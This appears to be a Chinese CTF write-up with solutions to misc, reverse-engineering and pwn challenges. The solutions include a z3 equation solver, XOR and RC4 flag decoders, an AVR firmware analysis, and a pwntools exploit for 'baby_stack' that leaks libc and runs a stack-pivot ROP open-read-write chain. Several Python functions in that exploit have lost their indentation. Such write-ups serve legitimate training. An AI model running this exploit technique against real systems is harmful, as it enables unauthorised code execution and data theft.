49 * a1 + 38 * a2 + 20 * a3 + 28 * a4 + 36 * a5 + 44 * a6 + 85 * a7 + 48 * a8 + 74 * a9 + 73 * a10 + 27 * a11 + 99 * a12 + 21 * a13 + 72 * a14 + 89 * a15 + 3 * a16 + 3 * a17 + 72 * a18 + 71 * a19 + 29 * a20 + 92 * a21 + 19 * a22 + 42 * a23 + 87 * a24 + 97 * a25 + 36 * a26 + 84 * a27 + 56 * a28 + 96 * a29 + 40 * a30 + 82 * a31 == 164206
81 * a1 + 88 * a2 + 41 * a3 + 98 * a4 + 8 * a5 + 70 * a6 + 19 * a7 + 85 * a8 + 37 * a9 + 64 * a10 + 24 * a11 + 96 * a12 + 94 * a13 + 78 * a14 + 81 * a15 + 38 * a16 + 10 * a17 + 87 * a18 + 75 * a19 + 35 * a20 + 7 * a21 + 98 * a22 + 63 * a23 + 37 * a24 + 4 * a25 + 40 * a26 + 13 * a27 + 83 * a28 + 99 * a29 + 61 * a30 + 60 * a31 == 171511
53 * a1 + 39 * a2 + 10 * a3 + 36 * a4 + 37 * a5 + 42 * a6 + 69 * a7 + 66 * a8 + 22 * a9 + 33 * a10 + 34 * a11 + 4 * a12 + 77 * a13 + 94 * a14 + 51 * a15 + 87 * a16 + 3 * a17 + 34 * a18 + 44 * a19 + 17 * a20 + 48 * a21 + 31 * a22 + 62 * a23 + 15 * a24 + 59 * a25 + 39 * a26 + 42 * a27 + 48 * a28 + 63 * a29 + 44 * a30 + 84 * a31 == 131705
95 * a1 + 37 * a2 + 70 * a3 + 10 * a4 + 72 * a5 + 37 * a6 + 26 * a7 + 11 * a8 + 89 * a9 + 36 * a10 + 80 * a11 + 81 * a12 + 13 * a13 + 84 * a14 + 79 * a15 + 69 * a16 + 15 * a17 + 53 * a18 + 52 * a19 + 92 * a20 + 13 * a21 + 44 * a22 + 33 * a23 + 48 * a24 + 77 * a25 + 40 * a26 + 50 * a27 + 20 * a28 + 9 * a29 + 69 * a30 + 44 * a31 == 149011
58 * a1 + 53 * a2 + 93 * a3 + 4 * a4 + 33 * a5 + 76 * a6 + 88 * a7 + 7 * a8 + 21 * a9 + 24 * a10 + 8 * a11 + 35 * a12 + 64 * a13 + 54 * a14 + 20 * a15 + 1 * a16 + 4 * a17 + 42 * a18 + 29 * a19 + 96 * a20 + 40 * a21 + 22 * a22 + 39 * a23 + 47 * a24 + 4 * a25 + 42 * a26 + 31 * a27 + 69 * a28 + 39 * a29 + 6 * a30 + 50 * a31 == 114939
89 * a1 + 73 * a2 + 43 * a3 + 41 * a4 + 28 * a5 + 19 * a6 + 83 * a7 + 32 * a8 + 65 * a9 + 37 * a10 + 22 * a11 + 22 * a12 + 42 * a13 + 74 * a14 + 43 * a15 + 72 * a16 + 4 * a17 + 94 * a18 + 66 * a19 + 60 * a20 + 63 * a21 + 91 * a22 + 69 * a23 + 7 * a24 + 39 * a25 + 96 * a26 + 76 * a27 + 5 * a28 + 32 * a29 + 57 * a30 + 22 * a31 == 147181
76 * a1 + 83 * a2 + 10 * a3 + 31 * a4 + 18 * a5 + 2 * a6 + 2 * a7 + 65 * a8 + 27 * a9 + 47 * a10 + 63 * a11 + 61 * a12 + 77 * a13 + 38 * a14 + 22 * a15 + 49 * a16 + 4 * a17 + 2 * a18 + 63 * a19 + 24 * a20 + 16 * a21 + 36 * a22 + 48 * a23 + 50 * a24 + 40 * a25 + 78 * a26 + 19 * a27 + 95 * a28 + 73 * a29 + 47 * a30 + 56 * a31 == 128931
93 * a1 + 3 * a2 + 86 * a3 + 90 * a4 + 97 * a5 + 11 * a6 + 66 * a7 + 69 * a8 + 96 * a9 + 62 * a10 + 40 * a11 + 58 * a12 + 25 * a13 + 64 * a14 + 50 * a15 + 65 * a16 + 59 * a17 + 5 * a18 + 7 * a19 + 55 * a20 + 92 * a21 + 29 * a22 + 35 * a23 + 83 * a24 + 59 * a25 + 55 * a26 + 51 * a27 + 62 * a28 + 1 * a29 + 64 * a30 + 12 * a31 == 159474
60 * a1 + 19 * a2 + 66 * a3 + 62 * a4 + 42 * a5 + 86 * a6 + 61 * a7 + 63 * a8 + 56 * a9 + 2 * a10 + 46 * a11 + 7 * a12 + 7 * a13 + 2 * a14 + 16 * a15 + 97 * a16 + 12 * a17 + 28 * a18 + 11 * a19 + 92 * a20 + 26 * a21 + 64 * a22 + 63 * a23 + 62 * a24 + 45 * a25 + 56 * a26 + 50 * a27 + 97 * a28 + 62 * a29 + 71 * a30 + 65 * a31 == 146558
6 * a1 + 78 * a2 + 51 * a3 + 74 * a4 + 1 * a5 + 25 * a6 + 41 * a7 + 99 * a8 + 52 * a9 + 74 * a10 + 30 * a11 + 97 * a12 + 63 * a13 + 2 * a14 + 25 * a15 + 76 * a16 + 56 * a17 + 35 * a18 + 28 * a19 + 34 * a20 + 40 * a21 + 18 * a22 + 65 * a23 + 67 * a24 + 43 * a25 + 78 * a26 + 6 * a27 + 54 * a28 + 38 * a29 + 45 * a30 + 81 * a31 == 146290
58 * a1 + 47 * a2 + 72 * a3 + 43 * a4 + 99 * a5 + 36 * a6 + 89 * a7 + 31 * a8 + 61 * a9 + 66 * a10 + 59 * a11 + 74 * a12 + 32 * a13 + 2 * a14 + 39 * a15 + 73 * a16 + 86 * a17 + 63 * a18 + 18 * a19 + 92 * a20 + 44 * a21 + 67 * a22 + 37 * a23 + 66 * a24 + 25 * a25 + 32 * a26 + 59 * a27 + 31 * a28 + 11 * a29 + 41 * a30 + 65 * a31 == 157439
79 * a1 + 18 * a2 + 22 * a3 + 73 * a4 + 21 * a5 + 76 * a6 + 5 * a7 + 27 * a8 + 36 * a9 + 22 * a10 + 90 * a11 + 23 * a12 + 20 * a13 + 88 * a14 + 77 * a15 + 18 * a16 + 10 * a17 + 14 * a18 + 80 * a19 + 1 * a20 + 96 * a21 + 97 * a22 + 41 * a23 + 90 * a24 + 53 * a25 + 20 * a26 + 41 * a27 + 2 * a28 + 87 * a29 + 8 * a30 + 40 * a31 == 127198
11 * a1 + 79 * a2 + 17 * a3 + 68 * a4 + 26 * a5 + 38 * a6 + 23 * a7 + 78 * a8 + 82 * a9 + 71 * a10 + 46 * a11 + 18 * a12 + 20 * a13 + 19 * a14 + 89 * a15 + 86 * a16 + 20 * a17 + 54 * a18 + 47 * a19 + 15 * a20 + 62 * a21 + 49 * a22 + 97 * a23 + 75 * a24 + 17 * a25 + 76 * a26 + 52 * a27 + 62 * a28 + 65 * a29 + 89 * a30 + 80 * a31 == 158569
79 * a1 + 10 * a2 + 66 * a3 + 31 * a4 + 76 * a5 + 58 * a6 + 45 * a7 + 64 * a8 + 97 * a9 + 9 * a10 + 15 * a11 + 6 * a12 + 61 * a13 + 65 * a14 + 52 * a15 + 1 * a16 + 38 * a17 + 11 * a18 + 66 * a19 + 21 * a20 + 30 * a21 + 76 * a22 + 41 * a23 + 75 * a24 + 52 * a25 + 45 * a26 + 91 * a27 + 96 * a28 + 29 * a29 + 64 * a30 + 59 * a31 == 149303
87 * a1 + 64 * a2 + 72 * a3 + 22 * a4 + 38 * a5 + 64 * a6 + 27 * a7 + 35 * a8 + 18 * a9 + 24 * a10 + 64 * a11 + 80 * a12 + 35 * a13 + 56 * a14 + 39 * a15 + 97 * a16 + 83 * a17 + 88 * a18 + 21 * a19 + 51 * a20 + 76 * a21 + 63 * a22 + 54 * a23 + 38 * a24 + 92 * a25 + 56 * a26 + 84 * a27 + 75 * a28 + 38 * a29 + 2 * a30 + 43 * a31 == 162212
94 * a1 + 70 * a2 + 72 * a3 + 93 * a4 + 17 * a5 + 56 * a6 + 53 * a7 + 78 * a8 + 72 * a9 + 49 * a10 + 86 * a11 + 62 * a12 + 41 * a13 + 85 * a14 + 69 * a15 + 71 * a16 + 20 * a17 + 34 * a18 + 24 * a19 + 24 * a20 + 14 * a21 + 86 * a22 + 54 * a23 + 13 * a24 + 41 * a25 + 68 * a26 + 31 * a27 + 50 * a28 + 23 * a29 + 94 * a30 + 72 * a31 == 162137
34 * a1 + 95 * a2 + 66 * a3 + 79 * a4 + 91 * a5 + 35 * a6 + 8 * a7 + 16 * a8 + 95 * a9 + 95 * a10 + 40 * a11 + 68 * a12 + 13 * a13 + 54 * a14 + 80 * a15 + 98 * a16 + 15 * a17 + 39 * a18 + 41 * a19 + 79 * a20 + 34 * a21 + 54 * a22 + 92 * a23 + 17 * a24 + 97 * a25 + 76 * a26 + 49 * a27 + 95 * a28 + 6 * a29 + 83 * a30 + 79 * a31 == 180077
74 * a1 + 42 * a2 + 45 * a3 + 72 * a4 + 6 * a5 + 3 * a6 + 59 * a7 + 47 * a8 + 57 * a9 + 62 * a10 + 85 * a11 + 6 * a12 + 72 * a13 + 25 * a14 + 78 * a15 + 27 * a16 + 6 * a17 + 27 * a18 + 61 * a19 + 88 * a20 + 60 * a21 + 89 * a22 + 53 * a23 + 76 * a24 + 97 * a25 + 56 * a26 + 52 * a27 + 26 * a28 + 5 * a29 + 7 * a30 + 35 * a31 == 142239
53 * a1 + 30 * a2 + 63 * a3 + 88 * a4 + 54 * a5 + 99 * a6 + 40 * a7 + 85 * a8 + 42 * a9 + 35 * a10 + 99 * a11 + 88 * a12 + 55 * a13 + 8 * a14 + 24 * a15 + 91 * a16 + 55 * a17 + 23 * a18 + 53 * a19 + 68 * a20 + 76 * a21 + 49 * a22 + 32 * a23 + 80 * a24 + 81 * a25 + 95 * a26 + 21 * a27 + 73 * a28 + 83 * a29 + 46 * a30 + 44 * a31 == 179115
55 * a1 + 43 * a2 + 39 * a3 + 27 * a4 + 19 * a5 + 41 * a6 + 7 * a7 + 70 * a8 + 54 * a9 + 53 * a10 + 38 * a11 + 72 * a12 + 50 * a13 + 1 * a14 + 15 * a15 + 89 * a16 + 79 * a17 + 17 * a18 + 32 * a19 + 58 * a20 + 64 * a21 + 68 * a22 + 12 * a23 + 92 * a24 + 53 * a25 + 33 * a26 + 54 * a27 + 67 * a28 + 34 * a29 + 25 * a30 + 37 * a31 == 140482
89 * a1 + 93 * a2 + 48 * a3 + 5 * a4 + 37 * a5 + 76 * a6 + 32 * a7 + 66 * a8 + 25 * a9 + 39 * a10 + 59 * a11 + 14 * a12 + 48 * a13 + 62 * a14 + 4 * a15 + 76 * a16 + 72 * a17 + 78 * a18 + 40 * a19 + 96 * a20 + 68 * a21 + 35 * a22 + 89 * a23 + 3 * a24 + 29 * a25 + 17 * a26 + 63 * a27 + 43 * a28 + 61 * a29 + 37 * a30 + 12 * a31 == 142706
4 * a1 + 25 * a2 + 16 * a3 + 45 * a4 + 65 * a5 + 17 * a6 + 39 * a7 + 59 * a8 + 82 * a9 + 54 * a10 + 69 * a11 + 59 * a12 + 86 * a13 + 37 * a14 + 70 * a15 + 21 * a16 + 46 * a17 + 89 * a18 + 96 * a19 + 32 * a20 + 35 * a21 + 69 * a22 + 22 * a23 + 13 * a24 + 95 * a25 + 58 * a26 + 94 * a27 + 29 * a28 + 84 * a29 + 24 * a30 + 3 * a31 == 146480
50 * a1 + 48 * a2 + 87 * a3 + 37 * a4 + 53 * a5 + 19 * a6 + 24 * a7 + 30 * a8 + 40 * a9 + 31 * a10 + 18 * a11 + 89 * a12 + 81 * a13 + 70 * a14 + 98 * a15 + 87 * a16 + 98 * a17 + 82 * a18 + 31 * a19 + 71 * a20 + 30 * a21 + 28 * a22 + 95 * a23 + 22 * a24 + 15 * a25 + 73 * a26 + 51 * a27 + 92 * a28 + 32 * a29 + 97 * a30 + 65 * a31 == 168401
40 * a1 + 20 * a2 + 13 * a3 + 25 * a4 + 87 * a5 + 95 * a6 + 47 * a7 + 80 * a8 + 22 * a9 + 43 * a10 + 4 * a11 + 83 * a12 + 50 * a13 + 85 * a14 + 39 * a15 + 22 * a16 + 75 * a17 + 3 * a18 + 22 * a19 + 6 * a20 + 16 * a21 + 29 * a22 + 65 * a23 + 19 * a24 + 64 * a25 + 48 * a26 + 41 * a27 + 8 * a28 + 10 * a29 + 66 * a30 + 12 * a31 == 117331
37 * a1 + 49 * a2 + 63 * a3 + 49 * a4 + 3 * a5 + 54 * a6 + 52 * a7 + 61 * a8 + 58 * a9 + 36 * a10 + 24 * a11 + 6 * a12 + 46 * a13 + 47 * a14 + 16 * a15 + 29 * a16 + 83 * a17 + 2 * a18 + 50 * a19 + 94 * a20 + 38 * a21 + 56 * a22 + 34 * a23 + 13 * a24 + 34 * a25 + 12 * a26 + 41 * a27 + 47 * a28 + 35 * a29 + 67 * a30 + 74 * a31 == 125357
37 * a1 + 2 * a2 + 12 * a3 + 84 * a4 + 79 * a5 + 36 * a6 + 93 * a7 + 64 * a8 + 68 * a9 + 7 * a10 + 37 * a11 + 58 * a12 + 68 * a13 + 49 * a14 + 19 * a15 + 95 * a16 + 43 * a17 + 22 * a18 + 10 * a19 + 21 * a20 + 70 * a21 + 72 * a22 + 73 * a23 + 19 * a24 + 32 * a25 + 8 * a26 + 6 * a27 + 89 * a28 + 43 * a29 + 32 * a30 + 95 * a31 == 138223
24 * a1 + 23 * a2 + 12 * a3 + 73 * a4 + 32 * a5 + 3 * a6 + 61 * a7 + 51 * a8 + 85 * a9 + 94 * a10 + 36 * a11 + 90 * a12 + 49 * a13 + 97 * a14 + 18 * a15 + 55 * a16 + 26 * a17 + 40 * a18 + 39 * a19 + 95 * a20 + 61 * a21 + 17 * a22 + 29 * a23 + 7 * a24 + 40 * a25 + 58 * a26 + 5 * a27 + 49 * a28 + 2 * a29 + 83 * a30 + 69 * a31 == 136759
64 * a1 + 28 * a2 + 52 * a3 + 74 * a4 + 84 * a5 + 36 * a6 + 39 * a7 + 55 * a8 + 40 * a9 + 44 * a10 + 47 * a11 + 23 * a12 + 1 * a13 + 58 * a14 + 33 * a15 + 25 * a16 + 70 * a17 + 20 * a18 + 45 * a19 + 33 * a20 + 15 * a21 + 77 * a22 + 46 * a23 + 8 * a24 + 5 * a25 + 98 * a26 + 39 * a27 + 72 * a28 + 9 * a29 + 99 * a30 + 25 * a31 == 128285
39 * a1 + 8 * a2 + 57 * a3 + 39 * a4 + 27 * a5 + 98 * a6 + 70 * a7 + 77 * a8 + 97 * a9 + 20 * a10 + 5 * a11 + 2 * a12 + 62 * a13 + 88 * a14 + 42 * a15 + 58 * a16 + 86 * a17 + 94 * a18 + 91 * a19 + 76 * a20 + 46 * a21 + 32 * a22 + 10 * a23 + 75 * a24 + 99 * a25 + 62 * a26 + 76 * a27 + 78 * a28 + 72 * a29 + 50 * a30 + 50 * a31 == 173243
52 * a1 + 69 * a2 + 20 * a3 + 29 * a4 + 23 * a5 + 30 * a6 + 74 * a7 + 21 * a8 + 9 * a9 + 5 * a10 + 76 * a11 + 5 * a12 + 45 * a13 + 49 * a14 + 59 * a15 + 25 * a16 + 98 * a17 + 54 * a18 + 80 * a19 + 19 * a20 + 51 * a21 + 37 * a22 + 85 * a23 + 84 * a24 + 78 * a25 + 54 * a26 + 5 * a27 + 21 * a28 + 97 * a29 + 92 * a30 + 78 * a31 == 138560

之后将得到的算式用 z3 求解出结果,再用 chr转换并拼接起来即可得到flag。

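# Hand-corrected equations, one per line (e.g. "40 * a1 + ... == 159700").
with open('yes.txt', 'r') as fh:
    res = fh.read().strip().split('\n')

from z3 import *

# One 7-bit unknown per coefficient.  The original created them with exec(f"a{i} = ...");
# a dict keeps them addressable by name without exec.
unknowns = {f'a{i}': BitVec(f'a{i}', 7) for i in range(1, 32)}

s = Solver()

# NOTE(review): eval() turns each text line into a z3 constraint.  The input is a local,
# hand-edited file, so that is acceptable here; the namespace is limited to the unknowns so a
# stray line cannot reach builtins.
# NOTE(review): with 7-bit vectors the arithmetic -- and, as I read z3's coercion of Python
# ints, the right-hand constants too -- wraps modulo 128, so the solver answers the system
# mod 128.  It worked for this instance; wider vectors would make the model exact.
for line in res:
    s.add(eval(line, {'__builtins__': {}}, unknowns))

# Turn the model back into characters, a1..a31 in order.
flag = ""
if s.check() == sat:
    model = s.model()
    for i in range(1, 32):
        value = model.eval(unknowns[f'a{i}'], model_completion=True)
        flag += chr(value.as_long())

print(flag)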
# flag{l0ng_1iv3_tHe_liT4ng_kiNg}

帕鲁服务器

一和二是一起做的(

先用火眼把恶意软件提取出来。

根据创建时间判断出恶意程序。

ida分析,看到一个类似flag的字符串。

这是 帕鲁服务器#2 的flag。

再接着分析:

这部分代码对v4做了个异或,猜测是 帕鲁服务器#1 flag,写个脚本解出来。

#include<iostream>
using namespace std;

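int main()
{
    // Bytes lifted from the binary; each is XORed with 0x25 to recover the flag text.
    // The original declared int a[33] with 29 initialisers and looped i <= 28 by hand;
    // sizing the array from its initialiser keeps the bound and the data in one place.
    const int a[] = {
        67, 73, 68, 66, 94, 112, 87, 122, 86, 22,
        87, 115, 64, 87, 122, 20, 86, 122, 75, 21,
        82, 122, 72, 124, 122, 85, 17, 73, 88};
    const int count = sizeof(a) / sizeof(a[0]);
    for (int i = 0; i < count; ++i) {
        std::cout << static_cast<char>(a[i] ^ 0x25);
    }
    return 0;
}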
// flag{Ur_s3rVer_1s_n0w_mY_p4l}

过去的CD

题目给了一个nrg 文件,用软碟通查看,发现有一个 wav 音频,提取出来。

Audacity查看音频,选择 音高 ,发现音频只有上下两种状态,且间隔比较固定,猜测是二进制。

根据上为1,下为0,以第一个下的宽度为固定间隔,把音频转成1和0。(手动转换)

01100110001101101000011011100110110111100100011010100110110011000000111011111010010001101111011000001100000011101111101001000110110011001010011000001110101111100101000011

最后把二进制转成字符即可得到flag。

RE

xor++

分析:

就一个异或,每次异或后v8++

#include<iostream>
using namespace std;

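int main()
{
    // Ciphertext lifted from the binary.  The original built it from a 7-character string
    // literal followed by 30 element assignments (v4[7]..v4[36]); the same 37 bytes are
    // listed here directly.
    const unsigned char v4[37] = {
        '%', '(', '$', '!', '<', '*', '<',
        30, 20, 40, 36, 40, 41, 97, 50, 39, 63,
        32, 12, 9, 32, 104, 55, 46, 4, 63, 53,
        106, 17, 7, 4, 61, 14, 17, 38, 14, 26};
    // Key byte starts at 67 and advances by one per position (the "++" in the title).
    int v8 = 67;
    for (int i = 0; i < 37; ++i) {
        std::cout << static_cast<char>(v8 ^ v4[i]);
        ++v8;
    }
    return 0;
}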
// flag{buT_diff1cultY_w0nt_ch4Nge_muCh}

钩子

ida硬找(

发现这里实现了一个rc4加密,猜测这里能出flag。

把key和密文扒下来,解密即可得到flag。

#include<iostream>
using namespace std;

// Key schedule: permute the 256-byte state v10 in place, driven by the 32-byte key
// (indexed j % 0x20) and a running index.
void init(unsigned char *v10,unsigned char *byte_7FF72ABB1410){
    int acc = 0;
    for (int idx = 0; idx < 256; ++idx) {
        acc = (byte_7FF72ABB1410[idx % 0x20] + v10[idx] + acc) % 256;
        const unsigned char saved = v10[idx];
        v10[idx] = v10[acc];
        v10[acc] = saved;
    }
}

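int main()
{
    // Identity permutation, then the key schedule with the 32-byte key lifted from the binary.
    unsigned char v10[256];
    for (int i = 0; i < 256; ++i)
        v10[i] = static_cast<unsigned char>(i);
    unsigned char byte_7FF72ABB1410[32] = {136, 227, 238, 17, 198, 73, 116, 165, 221, 152,
                                           89, 233, 72, 247, 110, 191, 58, 179, 155, 223,
                                           16, 66, 255, 153, 108, 227, 62, 5, 44, 101,
                                           71, 239};
    // Ciphertext bytes lifted from the binary.
    unsigned char byte_7FF72ABB1430[26] = {2, 204, 71, 179, 77, 108, 253, 154, 76, 78,
                                           212, 139, 30, 129, 25, 10, 52, 38, 208, 255,
                                           112, 182, 176, 146, 73, 179};
    init(v10, byte_7FF72ABB1410);
    // Keystream generation and XOR with the ciphertext.  The IDA output used MSVC's
    // `unsigned __int8`, which does not compile with GCC/Clang; `unsigned char` is the
    // portable equivalent and v10 already has that element type, so no cast is needed.
    int v6 = 0;
    int v8 = 0;
    for (int k = 0; k < 26; ++k) {
        v6 = (v6 + 1) % 256;
        v8 = (v10[v6] + v8) % 256;
        const unsigned char tmp = v10[v6];
        v10[v6] = v10[v8];
        v10[v8] = tmp;
        const unsigned char out =
            static_cast<unsigned char>(v10[(v10[v8] + v10[v6]) % 256] ^ byte_7FF72ABB1430[k]);
        std::cout << out;
    }
    return 0;
}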
// flag{ho00OoOoOoked_gotcha}

睡_Lite

文件名是 sleep_lite.ino.with_bootloader.standard.hex ,了解了一下是固件的hex文件。

ida分析,模式全都试一遍,直到能看到函数反编译出来。

选择 AVR 模式,能看到有函数反编译出来了。

稍微看一下,F5 不能用,但可以发现sub_48被多次调用,结合题意,猜测这是sleep函数。

接着就找 call 之前的操作,发现了字符。

把这些字符收集起来,即可得到flag。

flag{dEl4y_n0_MoR3}

Pwn

摩登Pwn

分析

发送一个0x80000000即可达成条件,需要转成10进制

baby_stack

栈迁移,前面有很大一串内存地址可以存放rop链,通过第一个输入点可以带出old_rbp,相当于可以通过计算偏移知道我们写入的rop链在栈上的那个位置,这样就不用去爆破了。开了沙箱,orw读flag。

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
ip_port = ['competition.blue-whale.me', 20896]
pwnfile = './pwn'

libcfile = './libc-2.23.so'
libc = ELF(libcfile)


def loginfo(a, b=None):
    """Log ``a`` through pwntools' logger, with ``hex(b)`` appended when ``b`` is given."""
    message = a if b is None else a + hex(b)
    log.info(message)


if len(sys.argv) == 2:
if 'p' in sys.argv[1]:
p = process(pwnfile)
elif 'r' in sys.argv[1]:
p = remote(ip_port[0], ip_port[1])
else:
loginfo("INVALID_PARAMETER")
sys.exit(1)


def recv64_addr():
return u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))


def debug(content=None):
    """Attach gdb to the running process (optionally with a gdb command script) and pause."""
    if content is None:
        gdb.attach(p)
    else:
        gdb.attach(p, content)
    pause()


def exp():
# debug('b *0x400AE0')
payload = 'a'*0x140
p.sendafter('content:', payload)
rbp_addr = recv64_addr()
loginfo('rbp_addr: ', rbp_addr)

pop_rdi_ret = 0x400b93
ret = 0x400B29
read_got = 0x601050
puts_plt = 0x4007E0
leave_ret = 0x400B09
func = 0x400A76

rop = p64(ret)*10 + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(0x400A76)
payload = rop.ljust(0x140,'a')
payload += p64(rbp_addr-0x150)
payload += p64(leave_ret)

p.sendafter('again:', payload)
puts_addr = recv64_addr()

libc_base = puts_addr - libc.symbols['read']
loginfo('libc_base: ',libc_base)

pop_rsi_ret = libc_base + 0x202f8
pop_rdx_ret = libc_base + 0x1b92
open_addr = libc_base + libc.symbols['open']
read_addr = libc_base + libc.symbols['read']
flag = rbp_addr - 0x1B0

orw = p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)
orw += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(rbp_addr - 0x1A0) + p64(read_addr)
orw += p64(pop_rdi_ret) + p64(rbp_addr - 0x1A0) + p64(puts_plt)
orw += p64(0)*2 + '/flag\x00'

payload = orw.ljust(0x140,'a')
payload += p64(rbp_addr-0x230)
payload += p64(leave_ret)

p.sendlineafter('content:', 'a')
p.sendafter('again:', payload)

exp()
p.interactive()